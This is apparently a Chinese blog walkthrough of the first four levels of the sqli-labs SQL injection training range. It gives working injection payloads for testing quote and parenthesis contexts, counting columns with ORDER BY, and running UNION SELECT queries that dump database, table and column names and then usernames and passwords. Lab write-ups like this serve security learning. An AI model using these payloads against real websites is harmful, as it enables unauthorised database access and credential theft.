sqli-labs靶场1-4关

第一关

判断注入点:
?id=1 回显正常
在这里插入图片描述?id=1’ 回显错误
在这里插入图片描述可以判断出是基于单引号注入
然后and判断一下
?id=1’ and 1=1 回显正常
在这里插入图片描述?id=1’ and 1=2 回显错误
在这里插入图片描述证明存在注入漏洞
则or 相反
?id=1’ or 1=2 --+ (回显正常)
?id=1’ or 1=1 --+ (回显错误,证明存在注入漏洞)//(暂时没验证)
然后我们判断一下列数
?id=1’ order by 3 --+(没报错)
?id=1’ order by 4 --+ (报错)
证明列数为3
在这里插入图片描述然后我们将前面置为错误
为什么要将前面置为错误呢?
因为他的显示位只有一个,只有让前边的报错,才能让后边的正常执行
联合查询一下
?id=1’ and 1=2 union select 1,2,3 --+ //注意and后面有空格
在这里插入图片描述基于上述的简单联合查询
进行爆表

?id=1' and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata --+

在这里插入图片描述
在这里插入图片描述然后基于上述进行爆表
咱们进行爆security库内的表

?id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

在这里插入图片描述

在这里插入图片描述爆出来的表有一个users对我们有用(渗透思维)
搞他
爆字段

?id=1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+

在这里插入图片描述在这里插入图片描述终于快拿到自己想要的了
爆字段里面的数据
有用的也就username和password了

爆字段里面的数据

?id=1' and 1=2 union select 1,group_concat(username,0x5c,password),3 from  users --+   

注意0x5c是\转义符
在这里插入图片描述在这里插入图片描述终于完成了
可以回去睡觉了
因为前四关都是一样的我就来写一下判断注入点步骤

第二关是整数型

?id=1 and 1=2 --+ (报错)
?id=1 and 1=1 --+ (正常执行)
存在整数型注入点

在这里插入图片描述验证一下
剩下的爆库和第一关的一样就好

在这里插入图片描述

第三关

判断注入点
?id=1’) and 1=1 --+ (回显正常)
?id=1’) and 1=2 --+ (回显错误)
存在’)的注入点
在这里插入图片描述验证一下
在这里插入图片描述第四关:
源码分析
在这里插入图片描述因为$id一开始传参的时候就被包裹了双引号,因为在php中.是连接符,单引号里面的是要要引用的字符,下边执行sql查询语句的时候,又被括号包裹,所以注入点是(‘’)

判断注入点:
?id=1") and 1=2 --+ (回显错误)
?id=1") and 1=1 --+ (回显正确)
基于”)的注入点
验证一下
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值